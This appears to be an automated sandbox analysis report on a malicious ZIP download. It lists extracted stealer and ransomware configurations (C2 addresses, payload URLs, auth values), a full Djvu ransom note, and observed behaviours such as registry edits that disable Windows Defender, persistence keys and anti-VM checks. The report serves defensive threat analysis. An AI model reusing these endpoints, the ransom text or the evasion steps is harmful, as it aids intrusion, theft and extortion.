Resubmissions
16-09-2022 06:07
220916-gvaj4saeen 1016-09-2022 06:06
220916-gtp86segh5 116-09-2022 05:24
220916-f36rvaaeal 1015-09-2022 08:38
220915-kj2e8scdh7 10Analysis
-
max time kernel
301s -
max time network
304s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
16-09-2022 05:24
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=0
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=0
Resource
win10v2004-20220812-en
General
-
Target
https://www.dropbox.com/s/v74d5j0q01fe6uk/File.zip?dl=0
Malware Config
Extracted
privateloader
http://163.123.143.4/proxies.txt
http://107.182.129.251/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
163.123.143.12
http://91.241.19.125/pub.php?pub=one
http://sarfoods.com/index.php
-
payload_url
https://vipsofts.xyz/files/mega.bmp
Extracted
redline
nam6.2
103.89.90.61:34589
-
auth_value
4040fe7c77de89cf1a6f4cebd515c54c
Extracted
redline
crtest
denestyenol.xyz:81
-
auth_value
ac9c5d38bbc1b733c499deeab5940e0d
Extracted
redline
Lyla3.12.09
185.215.113.216:21921
-
auth_value
893298c4bebea403e4a59dd151c4fcc2
Extracted
nymaim
208.67.104.97
85.31.46.167
Extracted
djvu
http://acacaca.org/test3/get.php
-
extension
.eemv
-
offline_id
5IVlpkccZlJz0AZ5atgGWVKe9CGAnXjohDf40mt1
-
payload_url
http://rgyui.top/dl/build2.exe
http://acacaca.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-0e5rCKsYCc Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0560Jhyjd
Extracted
redline
3108_RUZKI
213.219.247.199:9452
-
auth_value
f71fed1cd094e4e1eb7ad1c53e542bca
Signatures
-
DcRat 18 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exexsv.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeVQbpujdSGomqnbS9WjiyreEK.exeschtasks.exemsedge.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 11856 schtasks.exe 12676 schtasks.exe 12584 schtasks.exe 12748 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clipper = "\"C:\\Users\\Admin\\AppData\\Roaming\\Clipper\\Clipper.exe\" " xsv.exe 11644 schtasks.exe 20016 schtasks.exe 12180 schtasks.exe 59848 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\fc9a62cb-7d5f-48e5-9c75-c63867ff4d84\\VQbpujdSGomqnbS9WjiyreEK.exe\" --AutoStart" VQbpujdSGomqnbS9WjiyreEK.exe 12628 schtasks.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection msedge.exe 6220 schtasks.exe 72496 schtasks.exe 66408 schtasks.exe 12412 schtasks.exe 12540 schtasks.exe 19860 schtasks.exe -
Detected Djvu ransomware 5 IoCs
Processes:
resource yara_rule behavioral2/memory/2140-319-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5788-321-0x0000000002210000-0x000000000232B000-memory.dmp family_djvu behavioral2/memory/2140-316-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2140-314-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/2140-335-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Detects Smokeloader packer 1 IoCs
Processes:
resource yara_rule behavioral2/memory/5752-310-0x00000000001C0000-0x00000000001C9000-memory.dmp family_smokeloader -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Processes:
ybRTF_ZrBzghRmdqS2tL_QaU.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection ybRTF_ZrBzghRmdqS2tL_QaU.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" ybRTF_ZrBzghRmdqS2tL_QaU.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" ybRTF_ZrBzghRmdqS2tL_QaU.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" ybRTF_ZrBzghRmdqS2tL_QaU.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" ybRTF_ZrBzghRmdqS2tL_QaU.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" ybRTF_ZrBzghRmdqS2tL_QaU.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" ybRTF_ZrBzghRmdqS2tL_QaU.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 55508 3572 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 8 IoCs
Processes:
resource yara_rule behavioral2/memory/6036-230-0x0000000000C30000-0x00000000015C6000-memory.dmp family_redline behavioral2/memory/380-225-0x00000000009C0000-0x00000000009E8000-memory.dmp family_redline C:\Users\Admin\Pictures\Minor Policy\n2bxaZuE24qU0suJTAECSlqq.exe family_redline C:\Users\Admin\Pictures\Minor Policy\n2bxaZuE24qU0suJTAECSlqq.exe family_redline behavioral2/memory/5772-247-0x0000000000B30000-0x0000000000B58000-memory.dmp family_redline behavioral2/memory/6044-280-0x00000000007C0000-0x000000000111E000-memory.dmp family_redline behavioral2/memory/6036-281-0x0000000000C30000-0x00000000015C6000-memory.dmp family_redline behavioral2/memory/59796-430-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
nnb09fHefcHKAg9TUhBoFZHP.exegVzdKeepeV1HvUj2IfZ0crmv.exeeHFS6NZuqQ_xO0mJVksaQreP.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ nnb09fHefcHKAg9TUhBoFZHP.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ gVzdKeepeV1HvUj2IfZ0crmv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ eHFS6NZuqQ_xO0mJVksaQreP.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
Processes:
DnsService.exeDnsService.exeDnsService.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts DnsService.exe File opened for modification C:\Windows\System32\drivers\etc\hosts DnsService.exe File opened for modification C:\Windows\System32\drivers\etc\hosts DnsService.exe -
Executes dropped EXE 64 IoCs
Processes:
SN8pRGmvfIetO31nMREgZCBd.exe5dql7piSRHDDYa_r8buffZkT.exem7tpR8y__P6zIjNc638scLmV.exe_TiaXZiUu6XgZbvoAZY2sRH0.exeuV50xbiY4LlMWsebJOoi_R_O.exe75huro8A6uIQ4Z3yLnBxmNPI.exe7c54za4xnx_ox5Ogv39y8LB9.exeVQbpujdSGomqnbS9WjiyreEK.exer66VAUj92jmJRCibPDw4l9Kb.exeGosxYJzZkoJQOXo9mXaLnZ9Q.exeKJN4UTMVm4u4hm7saACgHkd5.exeDj7oV6pePcIXJQ2f96mvaT24.exe5XX9Z8GfruEUHkqLJGNcaeDq.exeoMPcKCByxz6c6aQOVuge8D1R.exe6nu8WAAz96Ll697FGgrU_0Ep.exeOaITYmj2fsq0x8aMFqNsCs4j.exen2bxaZuE24qU0suJTAECSlqq.exennb09fHefcHKAg9TUhBoFZHP.exegVzdKeepeV1HvUj2IfZ0crmv.exeeHFS6NZuqQ_xO0mJVksaQreP.exeSN8pRGmvfIetO31nMREgZCBd.exeoMPcKCByxz6c6aQOVuge8D1R.exe4CBGCHM82DE58EB.exe4CBGCHM82DE58EB.exeK94I82H7GA442K5.exeKJN4UTMVm4u4hm7saACgHkd5.exeK94I82H7GA442K5.exe0JE7G3LK557H5E8.exeVQbpujdSGomqnbS9WjiyreEK.exe368C0412AGB029I.exeybRTF_ZrBzghRmdqS2tL_QaU.exeN_fBXPZTfeRGqijnkDa5J2Jc.exe5PzEorzxArsuyso_tUF64BQZ.exeXqFLMvUeBEg_P943krgYtWkU.exe36tK0gCUVT2orDhALS0_tIKC.exenoX74RWvzcp4L6vaQgCqmGgG.exe2Se_pjJglnDpbeqjf2ldznTA.exektN6_OKyWBLIic4tRrS6Y7lW.exeYisnVpUhrZ2PWS7ZEq2F4LK4.exeI8dJ1qS1rcI5yzla9SoRu01p.exeaICl8GfONwp8nKT_VlnQ1Edr.exenvNlamGS3lVvMXNb9dzkJmr7.exeqOxMIfZDfCKOLU4NJPxsAIR6.exeIqRZ5EVEdrzfFjHTHidxBAdw.exe36tK0gCUVT2orDhALS0_tIKC.tmpInstall.exeInstall.exeVQbpujdSGomqnbS9WjiyreEK.exe5PzEorzxArsuyso_tUF64BQZ.exeVQbpujdSGomqnbS9WjiyreEK.exeAdblock.execrashpad_handler.exebuild2.exeAdblockInstaller.exebuild3.exeAdblockInstaller.tmpDnsService.exeDnsService.exeDnsService.exebuild2.exedaUkIim.exemstsca.exexsv.exeRespect.exe.pifpid process 5740 SN8pRGmvfIetO31nMREgZCBd.exe 5728 5dql7piSRHDDYa_r8buffZkT.exe 5716 m7tpR8y__P6zIjNc638scLmV.exe 5764 _TiaXZiUu6XgZbvoAZY2sRH0.exe 5752 uV50xbiY4LlMWsebJOoi_R_O.exe 5800 75huro8A6uIQ4Z3yLnBxmNPI.exe 5776 7c54za4xnx_ox5Ogv39y8LB9.exe 5788 VQbpujdSGomqnbS9WjiyreEK.exe 5812 r66VAUj92jmJRCibPDw4l9Kb.exe 5968 GosxYJzZkoJQOXo9mXaLnZ9Q.exe 5992 KJN4UTMVm4u4hm7saACgHkd5.exe 6012 Dj7oV6pePcIXJQ2f96mvaT24.exe 6028 5XX9Z8GfruEUHkqLJGNcaeDq.exe 6064 oMPcKCByxz6c6aQOVuge8D1R.exe 6072 6nu8WAAz96Ll697FGgrU_0Ep.exe 6056 OaITYmj2fsq0x8aMFqNsCs4j.exe 380 n2bxaZuE24qU0suJTAECSlqq.exe 6036 nnb09fHefcHKAg9TUhBoFZHP.exe 6020 gVzdKeepeV1HvUj2IfZ0crmv.exe 6044 eHFS6NZuqQ_xO0mJVksaQreP.exe 5736 SN8pRGmvfIetO31nMREgZCBd.exe 5772 oMPcKCByxz6c6aQOVuge8D1R.exe 73724 4CBGCHM82DE58EB.exe 4272 4CBGCHM82DE58EB.exe 73696 K94I82H7GA442K5.exe 45648 KJN4UTMVm4u4hm7saACgHkd5.exe 73588 K94I82H7GA442K5.exe 73612 0JE7G3LK557H5E8.exe 2140 VQbpujdSGomqnbS9WjiyreEK.exe 2760 368C0412AGB029I.exe 59600 ybRTF_ZrBzghRmdqS2tL_QaU.exe 51456 N_fBXPZTfeRGqijnkDa5J2Jc.exe 51472 5PzEorzxArsuyso_tUF64BQZ.exe 51484 XqFLMvUeBEg_P943krgYtWkU.exe 51492 36tK0gCUVT2orDhALS0_tIKC.exe 51500 noX74RWvzcp4L6vaQgCqmGgG.exe 51508 2Se_pjJglnDpbeqjf2ldznTA.exe 51516 ktN6_OKyWBLIic4tRrS6Y7lW.exe 51524 YisnVpUhrZ2PWS7ZEq2F4LK4.exe 51532 I8dJ1qS1rcI5yzla9SoRu01p.exe 51588 aICl8GfONwp8nKT_VlnQ1Edr.exe 51464 nvNlamGS3lVvMXNb9dzkJmr7.exe 51540 qOxMIfZDfCKOLU4NJPxsAIR6.exe 51548 IqRZ5EVEdrzfFjHTHidxBAdw.exe 53464 36tK0gCUVT2orDhALS0_tIKC.tmp 9452 Install.exe 70660 Install.exe 70700 VQbpujdSGomqnbS9WjiyreEK.exe 71064 5PzEorzxArsuyso_tUF64BQZ.exe 71616 VQbpujdSGomqnbS9WjiyreEK.exe 71628 Adblock.exe 5528 crashpad_handler.exe 5132 build2.exe 5440 AdblockInstaller.exe 6184 build3.exe 6200 AdblockInstaller.tmp 10468 DnsService.exe 10508 DnsService.exe 10528 DnsService.exe 10572 build2.exe 17984 daUkIim.exe 18176 mstsca.exe 19680 xsv.exe 20368 Respect.exe.pif -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Minor Policy\_TiaXZiUu6XgZbvoAZY2sRH0.exe vmprotect C:\Users\Admin\Pictures\Minor Policy\_TiaXZiUu6XgZbvoAZY2sRH0.exe vmprotect behavioral2/memory/5764-232-0x0000000140000000-0x0000000140608000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
eHFS6NZuqQ_xO0mJVksaQreP.exennb09fHefcHKAg9TUhBoFZHP.exeInstall.exegVzdKeepeV1HvUj2IfZ0crmv.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eHFS6NZuqQ_xO0mJVksaQreP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eHFS6NZuqQ_xO0mJVksaQreP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion nnb09fHefcHKAg9TUhBoFZHP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion nnb09fHefcHKAg9TUhBoFZHP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion gVzdKeepeV1HvUj2IfZ0crmv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion gVzdKeepeV1HvUj2IfZ0crmv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 18 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Dj7oV6pePcIXJQ2f96mvaT24.exe18BA.exeKJN4UTMVm4u4hm7saACgHkd5.exe36tK0gCUVT2orDhALS0_tIKC.tmpInstall.exenvNlamGS3lVvMXNb9dzkJmr7.exeoaLvSCW.exe7c54za4xnx_ox5Ogv39y8LB9.exeybRTF_ZrBzghRmdqS2tL_QaU.exektN6_OKyWBLIic4tRrS6Y7lW.exebuild2.exeVQbpujdSGomqnbS9WjiyreEK.exem7tpR8y__P6zIjNc638scLmV.exeAdblock.exe18BA.exe0JE7G3LK557H5E8.exe5dql7piSRHDDYa_r8buffZkT.exeVQbpujdSGomqnbS9WjiyreEK.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Dj7oV6pePcIXJQ2f96mvaT24.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 18BA.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation KJN4UTMVm4u4hm7saACgHkd5.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 36tK0gCUVT2orDhALS0_tIKC.tmp Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation nvNlamGS3lVvMXNb9dzkJmr7.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation oaLvSCW.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 7c54za4xnx_ox5Ogv39y8LB9.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation ybRTF_ZrBzghRmdqS2tL_QaU.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation ktN6_OKyWBLIic4tRrS6Y7lW.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation build2.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation VQbpujdSGomqnbS9WjiyreEK.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation m7tpR8y__P6zIjNc638scLmV.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Adblock.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 18BA.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 0JE7G3LK557H5E8.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 5dql7piSRHDDYa_r8buffZkT.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation VQbpujdSGomqnbS9WjiyreEK.exe -
Drops startup file 1 IoCs
Processes:
Adblock.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adblock Fast.lnk Adblock.exe -
Loads dropped DLL 30 IoCs
Processes:
regsvr32.exerundll32.exerundll32.exe36tK0gCUVT2orDhALS0_tIKC.tmpregsvr32.exeDj7oV6pePcIXJQ2f96mvaT24.exeAdblock.exeAdblockInstaller.tmprundll32.exeAppLaunch.exebuild2.exeregsvr32.exeRespect.exe.pifrundll32.exepid process 27816 regsvr32.exe 27816 regsvr32.exe 10216 rundll32.exe 71640 rundll32.exe 53464 36tK0gCUVT2orDhALS0_tIKC.tmp 60536 regsvr32.exe 60536 regsvr32.exe 6012 Dj7oV6pePcIXJQ2f96mvaT24.exe 6012 Dj7oV6pePcIXJQ2f96mvaT24.exe 71628 Adblock.exe 71628 Adblock.exe 71628 Adblock.exe 71628 Adblock.exe 71628 Adblock.exe 71628 Adblock.exe 6200 AdblockInstaller.tmp 6536 rundll32.exe 4504 AppLaunch.exe 4504 AppLaunch.exe 10572 build2.exe 10572 build2.exe 25332 regsvr32.exe 25332 regsvr32.exe 20368 Respect.exe.pif 20368 Respect.exe.pif 20368 Respect.exe.pif 20368 Respect.exe.pif 20368 Respect.exe.pif 20368 Respect.exe.pif 12856 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Minor Policy\eHFS6NZuqQ_xO0mJVksaQreP.exe themida C:\Users\Admin\Pictures\Minor Policy\nnb09fHefcHKAg9TUhBoFZHP.exe themida C:\Users\Admin\Pictures\Minor Policy\eHFS6NZuqQ_xO0mJVksaQreP.exe themida C:\Users\Admin\Pictures\Minor Policy\gVzdKeepeV1HvUj2IfZ0crmv.exe themida C:\Users\Admin\Pictures\Minor Policy\gVzdKeepeV1HvUj2IfZ0crmv.exe themida C:\Users\Admin\Pictures\Minor Policy\nnb09fHefcHKAg9TUhBoFZHP.exe themida behavioral2/memory/6044-280-0x00000000007C0000-0x000000000111E000-memory.dmp themida behavioral2/memory/6036-281-0x0000000000C30000-0x00000000015C6000-memory.dmp themida -
Unexpected DNS network traffic destination 64 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 76.76.19.19 Destination IP 9.9.9.9 Destination IP 9.9.9.9 -
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
msedge.exeVQbpujdSGomqnbS9WjiyreEK.exe2Se_pjJglnDpbeqjf2ldznTA.exexsv.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\fc9a62cb-7d5f-48e5-9c75-c63867ff4d84\\VQbpujdSGomqnbS9WjiyreEK.exe\" --AutoStart" VQbpujdSGomqnbS9WjiyreEK.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 2Se_pjJglnDpbeqjf2ldznTA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 2Se_pjJglnDpbeqjf2ldznTA.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run xsv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Clipper = "\"C:\\Users\\Admin\\AppData\\Roaming\\Clipper\\Clipper.exe\" " xsv.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
eHFS6NZuqQ_xO0mJVksaQreP.exennb09fHefcHKAg9TUhBoFZHP.exegVzdKeepeV1HvUj2IfZ0crmv.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA eHFS6NZuqQ_xO0mJVksaQreP.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA nnb09fHefcHKAg9TUhBoFZHP.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gVzdKeepeV1HvUj2IfZ0crmv.exe -
Drops Chrome extension 1 IoCs
Processes:
oaLvSCW.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json oaLvSCW.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
oaLvSCW.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini oaLvSCW.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 262 ipinfo.io 277 api.2ip.ua 294 ipinfo.io 453 api.2ip.ua 456 api.2ip.ua 118 ipinfo.io 119 ipinfo.io 263 ipinfo.io 278 api.2ip.ua 296 ipinfo.io 373 api.2ip.ua 452 api.2ip.ua -
Drops file in System32 directory 15 IoCs
Processes:
daUkIim.exeoaLvSCW.exeInstall.exeInstall.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol daUkIim.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini daUkIim.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies oaLvSCW.exe File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini Install.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE oaLvSCW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 oaLvSCW.exe File opened for modification C:\Windows\System32\GroupPolicy Install.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol oaLvSCW.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 oaLvSCW.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
eHFS6NZuqQ_xO0mJVksaQreP.exennb09fHefcHKAg9TUhBoFZHP.exegVzdKeepeV1HvUj2IfZ0crmv.exepid process 6044 eHFS6NZuqQ_xO0mJVksaQreP.exe 6036 nnb09fHefcHKAg9TUhBoFZHP.exe 6020 gVzdKeepeV1HvUj2IfZ0crmv.exe -
Suspicious use of SetThreadContext 19 IoCs
Processes:
